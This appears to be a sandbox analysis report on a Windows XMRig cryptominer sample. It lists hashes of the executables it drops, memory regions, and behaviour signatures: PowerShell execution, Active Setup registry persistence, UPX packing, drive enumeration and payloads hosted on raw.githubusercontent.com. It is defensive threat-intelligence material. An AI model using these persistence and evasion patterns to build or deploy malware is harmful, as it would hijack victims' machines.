MD5 8e967b90d6a20298428b6c3bfe8048df
SHA1 68844d2006bffcc659b621c22b78190f8ac53e66
SHA256 60f8e4fb18d40ff5ce021132d09eef088fc09573321fcc3d223812b5f2ca41ba
SHA512 49522377bc3831a34ab8abacc715111c36abff3ce61fc9d8cf5a962f704470177f19aee4adf172c32f55aacc8bc7d903916a21bfbc367a206bed543962c2ea6b

C:\Windows\System\JJjLlUH.exe

MD5 124086b108447fda3ef924f6fe0212d0
SHA1 9d13aefecbe23a5d21a2f12fc6b8cb2213af1d10
SHA256 4f82d7447d58dfc6131f3a1b7bd4a6af4314f3eac6e5a475688b05e8f4cfa218
SHA512 a5d67b9cb9af6c913ddb9a1cd0fac2fcb5fadb34c2bf5fe6b1911c5b440241f88dce6685852e803ea3e82329c7ba5ebcdac3ffb764aa689857fc2e1cc3b17a25

C:\Windows\System\ygtUIca.exe

MD5 a0c1516ce1f734f631eee4cfc53a8296
SHA1 867d3fdc2e2dcaa38051276d053841c70a783d83
SHA256 09fa0a88936ad3cf2a487b90fd4b1450cd443c4afc237f21299dc1ccfa0f2024
SHA512 7f5e8f5dc8bdbf9622f74b264feb38413f74cea814718dc62621d0d985bbf58b161aa00d03406aba3db8bb1452ebe2b0d3bec225124219f3cf464f76809c28a2

C:\Windows\System\qUtHKyC.exe

MD5 d465c6b992b22a48b7e4e168129e8c04
SHA1 60ce0fb5991a62bb0ac92da0315f39898d5dc5bb
SHA256 27855e9c45bd41e9830280a648aee592ccbc668e4d860493321f7983bcac3233
SHA512 26d22b36d2a124ede88e11ac954e26a36f4c1e2fb9796bb05caa11172fa7724b56e7329421ef5d1f4b55d3e5984c90a0b0436f2ce81d700bfc9d28a584dcf148

C:\Windows\System\TAOyIgC.exe

MD5 b68b72e79bcb51ed67b0609f161e4c3d
SHA1 d5020dfb9642e662efaba8a36194cdc5a6e3d534
SHA256 31d6eb84a3b5a7115c70a69322e0863819aa2263d3b7012676a8fa5a49f7cfeb
SHA512 b3c12a1a4128f115515c6a2a318873097737c76608b6995dc899601fb8ba8f4ef08855cae2e848fa6bbe9e0f323aa75c36840b32d392177c8c8d48bdfa400ded

C:\Windows\System\ILGXdDw.exe

MD5 c0f5049da5e309570a5bec1b718669db
SHA1 8fbbe12ad0acef1094de0135888d27e28b437f14
SHA256 4a302cc15f01ec5c05836bb6488ce2522154438d928a0e033c093e60cafd6451
SHA512 735b38703ffa6ac1c49111ea12efc684eeab6501132112d4ddbc8045ea4b09b85939135e217a7ae3aa2c081c8a34a74cf6c2456969eb4a10b056eb1e74905af5

C:\Windows\System\OuNGpZq.exe

MD5 67deac45f365e72a0713b3509f786af2
SHA1 a80b29f12e08cccba6ceb9276f6e0c9ee6f53bc3
SHA256 f92cc4a377ffe7db1e12e7de227987adbcfa57bb4ada75c4e63833e964ad4a64
SHA512 5a6fb6ccc938bc1a8b49f875f46594e198dc33622ddb4061a78ea4456c2c1a89169881a7009b81746d2e549ea707d008141081695074e6d6d96a5487291dd810

C:\Windows\System\XDZxNQE.exe

MD5 a4c65f92ac6e92a62469f68d4adadd6c
SHA1 63238b67c9b23baf59aebafa9ceaf4b3f3ca8d8c
SHA256 45c1a823f29f872f2640ab61eabca7949d688eb4751ca7c2f57e4cf1ebb6f4d4
SHA512 ec751db0b16898ff41ef15052e38e7f9a8afc1c1434ea7d3334a87bebd348622f93df31de179e86e75f4c739b76de5c8308e5a061753b97710cc0accd085fb84

memory/2564-96-0x000001B8F4C40000-0x000001B8F4C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fzn2kedk.tia.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\pyyHgjv.exe

MD5 4f838111fe2c0bd0881639b04db13cf4
SHA1 9f38af039f52c4a173ed0c17691bfa1357b4af23
SHA256 54c4d0e8e47a36d8a00d69279ff1c023d18a994716255796da73a56b9ee432e0
SHA512 a7246d177175736662de39bcd9c6215af9e1e3b8b68a7f4e8ce3832a8fc37681adae637b50e0df7fc7cf2541b8aa102f546665d693d6aca2b32c017bce27c4be

C:\Windows\System\bLpZMhH.exe

MD5 5410dbf2e1a6c59968c804316ea48bba
SHA1 de760a3856852764aa02f318db95a8b5cd183354
SHA256 13cb07bdd448e1c4acf0babd089ab512f5db63dea1a92d4c86d938f3b4dffe79
SHA512 a232aa928d892ee60d35bccf330a1bd0f8eb0c3ee9dd3ea57902f27a132b87aeb63bd206b54417f5f985a7a7092e28ef7161ddf5a8a052446728c8eda215e13d

C:\Windows\System\SwCQmTw.exe

MD5 697e664be18f248459750675ec0823cf
SHA1 848b3815ec4c94f7eb137a9bdb5eca262c186814
SHA256 e05b6b998adf8b8a1da1dde428d5765d231c65b79a502b5674dc69d7f5af864d
SHA512 510685fba9647d8ac89d125ad9d7a0e282f6e7a2ce13e8f9c00e8614fe53d06504847f5e3731c10c20ce7cee1f9c9036e5209e52d982d9a267261c9eb1c93633

C:\Windows\System\nwWVnrF.exe

MD5 d4d57728c3e98392113919f4bee9a918
SHA1 95debce5bed9e9165c29518ae3d3084eadc4dfb8
SHA256 4b47c3585547baee42e388743adae4aa6ac7a2d3374f9b8d4cf8b1d77cf19ad1
SHA512 c13d911080b2c6e7dfe6699d7f3f1976be53920a99b330f1a9b7a949eac6ebb51d1bd4391076d0978f6eb3b5cc45f377af8659e9cf2036ed44d54e16a36df332

C:\Windows\System\urUyRME.exe

MD5 4ed4f9c744d1a067e2e8b3d2db75898f
SHA1 fd4b67c25e629f0831bf759266bba332bccc6dbd
SHA256 38d1730aefe64fab081a4dcd97831ec4861b388ef760279436172cb7ca36ae12
SHA512 0d06ea19aeb3d7ac64d0a305c198e77da53d60cf5e24fe62e15acd95a8527f9d967a96a03758e812416db213a5b0aee7ffd7d811cea885ce9a2f25f6fa3aa7e4

C:\Windows\System\PpisgNH.exe

MD5 1a73f9902f9e57449a9dbd8d01f39f80
SHA1 bd7782e28b376da53fbcd712109e2b129407a2c3
SHA256 d5f9d0e13d91072511316f83d416017e4c4e6f45a4bb87d310307e61cd1b1b63
SHA512 fa2f1b4e184638056df76a0950a70370be5d156a21c655aa28bbe83837564f3123dd50e3ffeac5514023e76f028c7a232755d4de68d253935aa937f8b4a7e7c8

C:\Windows\System\qndCowM.exe

MD5 42b896360b04dd1295309933d8f2c56b
SHA1 d802d8023a57527817c2ed6953e13069e8328146
SHA256 2d78215df272f1fde2b682455b87a327818bcdda7c24c428f97858c05f17f15d
SHA512 e8ddb7fa9021a0f8394ab559115f60f4f16cee3e81f42526f91dce80285bd0271db2ef170c2996ccd42384b5f55a92ef7b5728e5fa20adf8f1d1cb39b1caa197

C:\Windows\System\sOalaow.exe

MD5 a0adef72b8473f4a4d91c6ed1c36953d
SHA1 59d0f067c05aaa37c64b9a9c1e4456cec9275ea9
SHA256 b79ec5771077b1baf3eb4defd8516ae377a303795d1540ca8a4349afefb6cb11
SHA512 c2ff131c3f4bb1bde6eaf47d9acbad228e6726716e201cbd82b37f65a89f0b3ad1490e29700f3bfbfd15d46a277cb04866d8d5be2cc7f2932cf2c0fbbccd465f

memory/3304-20-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp

C:\Windows\System\axVNZQz.exe

MD5 757f411fecb96f87e8f04bb82f2fa8d1
SHA1 ed7ae496fd85f9ccc12f72809686217746b59d0f
SHA256 d295b8f1b75770f67069c0ddccbda1f9f0a5a407363f4309d19f4aaf9b560d25
SHA512 59c99126e20f0caa09f50732fa0338d2beca45184c866b31fab7cdd63cc0de72d323bfb823bd7270326d1c36db7a31bcd1776099e6381d75b7e5a2f757bd3b68

C:\Windows\System\aPjGTGe.exe

MD5 4eac20683b3e6107d10b3aaf46f63092
SHA1 22fa0d0d8a2b84fae94e1aea468cb88e2adff787
SHA256 62108aa93d33b51b2a0148d0375952995736f3d6b4cd5379df782a5f80e78506
SHA512 9f73c762d1bf6453f54639065118fccd451ca7dd850e9b3b2518751399bc5ccbb8574cdcb49d5b2f5533c932c86a5cd274e265a5eb62947ff0ee22475d36f3c3

memory/2452-10-0x00007FF683850000-0x00007FF683C46000-memory.dmp

memory/868-781-0x00007FF732FC0000-0x00007FF7333B6000-memory.dmp

memory/4376-788-0x00007FF70C050000-0x00007FF70C446000-memory.dmp

memory/3760-806-0x00007FF6F21A0000-0x00007FF6F2596000-memory.dmp

memory/1720-798-0x00007FF7931D0000-0x00007FF7935C6000-memory.dmp

memory/3544-794-0x00007FF691800000-0x00007FF691BF6000-memory.dmp

memory/3640-783-0x00007FF61D570000-0x00007FF61D966000-memory.dmp

memory/1716-809-0x00007FF6BA080000-0x00007FF6BA476000-memory.dmp

memory/8-816-0x00007FF7643C0000-0x00007FF7647B6000-memory.dmp

memory/1864-822-0x00007FF6EBE20000-0x00007FF6EC216000-memory.dmp

memory/2004-835-0x00007FF71F4D0000-0x00007FF71F8C6000-memory.dmp

memory/376-848-0x00007FF62EC10000-0x00007FF62F006000-memory.dmp

memory/888-852-0x00007FF66F3C0000-0x00007FF66F7B6000-memory.dmp

memory/3048-856-0x00007FF692270000-0x00007FF692666000-memory.dmp

memory/3316-850-0x00007FF745700000-0x00007FF745AF6000-memory.dmp

memory/3624-845-0x00007FF798660000-0x00007FF798A56000-memory.dmp

memory/3112-842-0x00007FF610590000-0x00007FF610986000-memory.dmp

memory/4692-839-0x00007FF766420000-0x00007FF766816000-memory.dmp

memory/5088-830-0x00007FF6E9BB0000-0x00007FF6E9FA6000-memory.dmp

memory/4424-826-0x00007FF65C290000-0x00007FF65C686000-memory.dmp

C:\Windows\System\hOrGcVk.exe

MD5 6c6a33c852f4e05ffd14cdf0dcab7779
SHA1 70449821f99925d7b8d245181569b7ac4d2ffae8
SHA256 889f3baefc9f46c7632a467db8882ec92f1f0df14da91d5a211e7484de261e45
SHA512 92e5654661ef50c470f84dbec4dcad9efdca5e4026c073f08c798af48c0b5d8107a7b2ff4d63fdb982f371e15d79e95f8a6d716a30b5c5123a7273c49d650d19

memory/2452-2105-0x00007FF683850000-0x00007FF683C46000-memory.dmp

memory/1468-2106-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp

memory/2792-2107-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp

memory/980-2108-0x00007FF634210000-0x00007FF634606000-memory.dmp

memory/3304-2109-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp

memory/2452-2119-0x00007FF683850000-0x00007FF683C46000-memory.dmp

memory/3304-2120-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp

memory/2792-2122-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp

memory/1468-2121-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp

memory/3316-2125-0x00007FF745700000-0x00007FF745AF6000-memory.dmp

memory/980-2124-0x00007FF634210000-0x00007FF634606000-memory.dmp

memory/888-2123-0x00007FF66F3C0000-0x00007FF66F7B6000-memory.dmp

memory/3048-2126-0x00007FF692270000-0x00007FF692666000-memory.dmp

memory/868-2130-0x00007FF732FC0000-0x00007FF7333B6000-memory.dmp

memory/1720-2132-0x00007FF7931D0000-0x00007FF7935C6000-memory.dmp

memory/3760-2131-0x00007FF6F21A0000-0x00007FF6F2596000-memory.dmp

memory/3640-2129-0x00007FF61D570000-0x00007FF61D966000-memory.dmp

memory/4376-2128-0x00007FF70C050000-0x00007FF70C446000-memory.dmp

memory/3544-2127-0x00007FF691800000-0x00007FF691BF6000-memory.dmp

memory/5088-2134-0x00007FF6E9BB0000-0x00007FF6E9FA6000-memory.dmp

memory/2004-2137-0x00007FF71F4D0000-0x00007FF71F8C6000-memory.dmp

memory/3112-2142-0x00007FF610590000-0x00007FF610986000-memory.dmp

memory/3624-2141-0x00007FF798660000-0x00007FF798A56000-memory.dmp

memory/376-2140-0x00007FF62EC10000-0x00007FF62F006000-memory.dmp

memory/1864-2139-0x00007FF6EBE20000-0x00007FF6EC216000-memory.dmp

memory/8-2136-0x00007FF7643C0000-0x00007FF7647B6000-memory.dmp

memory/4692-2135-0x00007FF766420000-0x00007FF766816000-memory.dmp

memory/1716-2133-0x00007FF6BA080000-0x00007FF6BA476000-memory.dmp

memory/4424-2138-0x00007FF65C290000-0x00007FF65C686000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 22:03

Reported

2024-06-03 22:19

Platform

win11-20240426-en

Max time kernel

957s

Max time network

512s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\axVNZQz.exe N/A
N/A N/A C:\Windows\System\aPjGTGe.exe N/A
N/A N/A C:\Windows\System\EWdOxVy.exe N/A
N/A N/A C:\Windows\System\brHqTLB.exe N/A
N/A N/A C:\Windows\System\IBMKRWO.exe N/A
N/A N/A C:\Windows\System\qndCowM.exe N/A
N/A N/A C:\Windows\System\sOalaow.exe N/A
N/A N/A C:\Windows\System\PpisgNH.exe N/A
N/A N/A C:\Windows\System\urUyRME.exe N/A
N/A N/A C:\Windows\System\nwWVnrF.exe N/A
N/A N/A C:\Windows\System\OwTpFMC.exe N/A
N/A N/A C:\Windows\System\SwCQmTw.exe N/A
N/A N/A C:\Windows\System\bLpZMhH.exe N/A
N/A N/A C:\Windows\System\pyyHgjv.exe N/A
N/A N/A C:\Windows\System\Burqpzn.exe N/A
N/A N/A C:\Windows\System\XDZxNQE.exe N/A
N/A N/A C:\Windows\System\OuNGpZq.exe N/A
N/A N/A C:\Windows\System\ILGXdDw.exe N/A
N/A N/A C:\Windows\System\TAOyIgC.exe N/A
N/A N/A C:\Windows\System\RdtjIlK.exe N/A
N/A N/A C:\Windows\System\qUtHKyC.exe N/A
N/A N/A C:\Windows\System\ygtUIca.exe N/A
N/A N/A C:\Windows\System\JJjLlUH.exe N/A
N/A N/A C:\Windows\System\ScQKdch.exe N/A
N/A N/A C:\Windows\System\trEJEmh.exe N/A
N/A N/A C:\Windows\System\nKADzeH.exe N/A
N/A N/A C:\Windows\System\ybHZLWM.exe N/A
N/A N/A C:\Windows\System\AmtaodT.exe N/A
N/A N/A C:\Windows\System\RLvenfC.exe N/A
N/A N/A C:\Windows\System\whoZHnc.exe N/A
N/A N/A C:\Windows\System\zoOJLVN.exe N/A
N/A N/A C:\Windows\System\SyqIKiE.exe N/A
N/A N/A C:\Windows\System\JwmkKWr.exe N/A
N/A N/A C:\Windows\System\uomMsCL.exe N/A
N/A N/A C:\Windows\System\qfsgPNK.exe N/A
N/A N/A C:\Windows\System\ZLHJgrb.exe N/A
N/A N/A C:\Windows\System\UpmNNNc.exe N/A
N/A N/A C:\Windows\System\jSHSNNo.exe N/A
N/A N/A C:\Windows\System\KjzBcML.exe N/A
N/A N/A C:\Windows\System\bxLGsnI.exe N/A
N/A N/A C:\Windows\System\HghtKZy.exe N/A
N/A N/A C:\Windows\System\HlheYaz.exe N/A
N/A N/A C:\Windows\System\DtakIIV.exe N/A
N/A N/A C:\Windows\System\KSLmDSj.exe N/A
N/A N/A C:\Windows\System\UVEbZRA.exe N/A
N/A N/A C:\Windows\System\EYBfZjX.exe N/A
N/A N/A C:\Windows\System\eRDrLDn.exe N/A
N/A N/A C:\Windows\System\Eokyjbl.exe N/A
N/A N/A C:\Windows\System\mgRmMZb.exe N/A
N/A N/A C:\Windows\System\nOqNTFJ.exe N/A
N/A N/A C:\Windows\System\glLEVTL.exe N/A
N/A N/A C:\Windows\System\CplFYAK.exe N/A
N/A N/A C:\Windows\System\uZyViSu.exe N/A
N/A N/A C:\Windows\System\zbFLVEz.exe N/A
N/A N/A C:\Windows\System\uoPtpCa.exe N/A
N/A N/A C:\Windows\System\seXQAAj.exe N/A
N/A N/A C:\Windows\System\IlhRTZJ.exe N/A
N/A N/A C:\Windows\System\mnIGCht.exe N/A
N/A N/A C:\Windows\System\PFwZwRy.exe N/A
N/A N/A C:\Windows\System\buusUZo.exe N/A
N/A N/A C:\Windows\System\ErfkTej.exe N/A
N/A N/A C:\Windows\System\TRdfIRQ.exe N/A
N/A N/A C:\Windows\System\BKhgDAT.exe N/A
N/A N/A C:\Windows\System\zgMDbxO.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\SosVcSq.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NIfHGHu.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\XACxhdm.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ZhUlFDQ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\BrlAFAw.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\fSyMVyu.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ZCAQwXc.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\uSixtwF.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\oxXjIGk.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\sLvScrX.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\fOovYpM.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\XRHoAwB.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\lmbYHdv.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\bmolHeg.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\Swmhofr.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\OEDMPFS.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NWYrfWT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\FUFLtqZ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\SzFfGTm.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\HRrkDGg.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\HKRxMOa.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ddFVXsS.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\FhrXrOg.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ggOfJfH.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\LDrVpzt.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\lFoGQPC.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\IiWIRsd.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ScXsLuI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\IBLmYuF.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\qyWqkVQ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\MCEzFhj.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\vWiGDvQ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ejGkarc.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\dvCqErO.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\kGMJunN.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\EqnakHV.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NYYWtin.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ItSVsyr.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\tHeKeTb.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\puetIbW.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\VqkBZoJ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\hFoXtZN.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\wtgmgFc.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\wThhJig.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\HaQcerY.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\gUbYcVJ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\IWBqNln.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\mHPgJaR.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
